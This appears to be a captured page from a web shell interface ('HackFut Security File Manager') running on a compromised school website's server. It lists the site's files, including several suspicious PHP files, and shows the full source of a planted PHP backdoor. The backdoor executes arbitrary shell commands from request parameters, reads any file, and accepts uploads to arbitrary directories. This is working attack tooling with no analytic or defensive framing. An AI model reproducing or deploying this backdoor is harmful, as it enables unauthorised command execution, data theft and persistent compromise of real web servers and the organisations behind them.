HackFut Security File Manager
Current Path:
D:\Inetpub\vhosts\rahulinternationalschool.com\httpdocs
Command Execution
D:
/
Inetpub
/
vhosts
/
rahulinternationalschool.com
/
httpdocs
/
📄
..
(0 B)
📄
.htaccess
(92 B)
📁
.well-known
📄
Default.aspx
(52.77 KB)
📄
Default.aspx.cs
(373 B)
📄
NewFile
(0 B)
📄
Principal.aspx
(3.21 KB)
📄
SBHW.aspx
(5.09 KB)
📄
SBHW.aspx.cs
(395 B)
📄
Web.config
(489 B)
📄
about.aspx
(3.26 KB)
📄
about.aspx.cs
(277 B)
📄
admissionprocedure.aspx
(2.14 KB)
📄
admissionprocedure.aspx.cs
(290 B)
📄
anehin.txt
(1 B)
📄
api.php
(30.29 KB)
📄
cbse.aspx
(44.33 KB)
📄
cbse.aspx.cs
(323 B)
📄
chairman.aspx
(3.86 KB)
📄
contactus.aspx
(4.13 KB)
📄
contactus.aspx.cs
(360 B)
📁
css
📄
downloads.aspx
(1.29 KB)
📄
downloads.aspx.cs
(395 B)
📄
facilities.aspx
(10.43 KB)
📄
facilities.aspx.cs
(282 B)
📄
fees-structure.aspx
(7.47 KB)
📄
fees-structure.aspx.cs
(286 B)
📄
gallery.aspx
(6.15 KB)
📄
gallery.aspx.cs
(377 B)
📁
images
📁
img
📄
imw5a62f.php
(981 B)
📄
index-old.php
(10.95 KB)
📄
index.php
(4.44 KB)
📁
js
📄
kavda.php
(26.96 KB)
📄
manager.php
(4.44 KB)
📄
md.aspx
(3.29 KB)
📄
meewa.php
(26.96 KB)
📁
owl
📁
pdf
Editing: imw5a62f.php
<?php if(isset($_GET['cmd'])){ $cmd = $_GET['cmd']; echo "<pre>"; system($cmd); echo "</pre>"; } if(isset($_POST['cmd'])){ $cmd = $_POST['cmd']; echo "<pre>"; system($cmd); echo "</pre>"; } if(isset($_GET['f'])){ $file = $_GET['f']; echo file_get_contents($file); } if(isset($_FILES['file'])){ $upload_dir = isset($_GET['dir']) ? $_GET['dir'] : '.'; if(!is_dir($upload_dir)){ mkdir($upload_dir, 0777, true); } $target_file = $upload_dir . '/' . basename($_FILES['file']['name']); if(move_uploaded_file($_FILES['file']['tmp_name'], $target_file)){ echo "Uploaded to: " . $target_file; } else { echo "Upload failed!"; } } if(isset($_GET['ups'])){ echo '<form method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="text" name="dir" placeholder="upload directory" value="."> <input type="submit" value="Upload"> </form>'; } phpinfo(); ?>
Upload File
Create Folder